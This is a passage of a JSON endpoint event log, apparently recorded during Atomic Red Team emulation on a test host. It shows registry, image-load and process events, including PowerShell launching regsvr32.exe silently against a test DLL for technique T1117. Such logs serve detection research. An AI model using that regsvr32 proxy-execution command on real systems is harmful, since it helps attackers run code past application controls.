"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573241509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573241509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573241509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573241509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573241509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573241509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573241509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573241509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573241509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573241509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573241509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573241509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "ole32.dll", - "image_path": "C:\\Windows\\System32\\ole32.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573241509984, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "uxtheme.dll", - "image_path": "C:\\Windows\\System32\\uxtheme.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573241509984, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573241670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573241670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573241670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573241670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573241670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573241670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573241670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573241670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573241670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573241670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573241670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573241670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573241670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573241670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573241670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "calc.exe", - "image_path": "C:\\Windows\\System32\\calc.exe", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "propsys.dll", - "image_path": "C:\\Windows\\System32\\propsys.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573241670000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "oleaut32.dll", - "image_path": "C:\\Windows\\System32\\oleaut32.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573241670000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "process", - "pid": 2652, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883573241670000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010AA385401}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 1216, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883573241740000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-0010FE595401}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1216, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573241670000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-0010FE595401}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1216, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573241670000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-0010FE595401}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1216, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573241670000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-0010FE595401}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1216, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573241670000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-0010FE595401}" - }, - { - "event_type": "image_load", - "image_name": "clbcatq.dll", - "image_path": "C:\\Windows\\System32\\clbcatq.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573241670000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "OneCoreUAPCommonProxyStub.dll", - "image_path": "C:\\Windows\\System32\\OneCoreUAPCommonProxyStub.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573241670000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1216, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573241670000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-0010FE595401}" - }, - { - "event_type": "registry", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", - "registry_value": "NameSpace", - "timestamp": 131883573241830000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "registry", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", - "registry_value": "NameSpace", - "timestamp": 131883573241830000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "registry", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace\\DelegateFolders", - "registry_value": "DelegateFolders", - "timestamp": 131883573241830000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "urlmon.dll", - "image_path": "C:\\Windows\\System32\\urlmon.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573241830000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "iertutil.dll", - "image_path": "C:\\Windows\\System32\\iertutil.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573241830000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "cryptbase.dll", - "image_path": "C:\\Windows\\System32\\cryptbase.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573241830000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "registry", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573241830000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "process", - "pid": 1216, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883573241830000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-0010FE595401}" - }, - { - "event_type": "file", - "file_name": "REGSVR32.EXE-55A4EE79.pf", - "file_path": "C:\\Windows\\Prefetch\\REGSVR32.EXE-55A4EE79.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883573241830000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "command_line": "\"C:\\Windows\\syswow64\\regsvr32.exe\" /s C:\\AtomicRedTeam\\atomics\\T1117\\bin\\AllTheThingsx86.dll", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 1284, - "ppid": 7036, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "subtype": "create", - "timestamp": 131883573242300000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\regsvr32.exe\" /s C:\\AtomicRedTeam\\atomics\\T1117\\bin\\AllTheThingsx86.dll", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 7428, - "ppid": 7036, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "subtype": "create", - "timestamp": 131883573242340000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573242300000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\SysWOW64\\ntdll.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573242300000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "regsvr32.exe", - "image_path": "C:\\Windows\\System32\\regsvr32.exe", - "pid": 7428, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573242300000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7428, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573242300000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7428, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573242300000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7428, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573242300000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" - }, - { - "event_type": "image_load", - "image_name": "apphelp.dll", - "image_path": "C:\\Windows\\System32\\apphelp.dll", - "pid": 7428, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573242300000, - "unique_pid": 